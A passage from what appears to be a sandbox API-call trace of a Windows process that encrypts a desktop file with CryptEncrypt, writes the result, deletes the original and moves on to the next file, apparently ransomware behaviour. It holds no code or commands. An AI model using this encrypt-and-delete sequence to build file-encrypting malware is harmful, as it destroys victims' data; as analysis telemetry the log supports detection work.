lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.671] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xd6ba, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xd6c0) returned 1 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0123.675] CharLowerBuffW (in: lpsz="byte[54977]", cchLength=0xb | out: lpsz="byte[54977]") returned 0xb [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0123.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0123.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caf58 [0123.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.676] CryptEncrypt (in: hKey=0x41ac500, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49d2468*, pdwDataLen=0x144e790*=0xd6ba, dwBufLen=0xd6c0 | out: pbData=0x49d2468*, pdwDataLen=0x144e790*=0xd6c0) returned 1 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0123.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.676] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.676] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144f194*=0xd6c0, lpOverlapped=0x0) returned 1 [0123.678] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0123.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0123.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca820, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.679] CryptDestroyKey (hKey=0x41ac500) returned 1 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.679] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.679] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.679] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0123.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.679] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0123.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.680] FreeLibrary (hLibModule=0x756e0000) returned 1 [0123.680] CloseHandle (hObject=0x258) returned 1 [0123.680] CloseHandle (hObject=0x2a0) returned 1 [0123.682] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots", lpFilePart=0x0) returned 0x2e [0123.682] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\jhcqtc-oyo hp07enj.ots")) returned 0x20 [0123.682] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6ceb560, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x1063a710, ftLastAccessTime.dwHighDateTime=0x1d5e941, ftLastWriteTime.dwLowDateTime=0x1063a710, ftLastWriteTime.dwHighDateTime=0x1d5e941, nFileSizeHigh=0x0, nFileSizeLow=0xd6ba, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="jHCQtc-oyo Hp07enJ.ots", cAlternateFileName="JHCQTC~1.OTS")) returned 0x41ac500 [0123.682] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\jhcqtc-oyo hp07enj.ots")) returned 1 [0123.748] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6ceb560, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x1063a710, ftLastAccessTime.dwHighDateTime=0x1d5e941, ftLastWriteTime.dwLowDateTime=0x1063a710, ftLastWriteTime.dwHighDateTime=0x1d5e941, nFileSizeHigh=0x0, nFileSizeLow=0xd6ba, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="jHCQtc-oyo Hp07enJ.ots", cAlternateFileName="JHCQTC~1.OTS")) returned 0 [0123.748] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0123.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0123.749] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0123.749] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0123.749] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.749] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.749] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.750] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.750] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41629130, ftCreationTime.dwHighDateTime=0x1d5ebbe, ftLastAccessTime.dwLowDateTime=0xcb05e920, ftLastAccessTime.dwHighDateTime=0x1d5eb9e, ftLastWriteTime.dwLowDateTime=0xcb05e920, ftLastWriteTime.dwHighDateTime=0x1d5eb9e, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="kLTeW7.mp3", cAlternateFileName="")) returned 0x41ac640 [0123.750] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0123.750] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.751] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.752] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.753] HeapFree (in: hHeap=0x1780000, 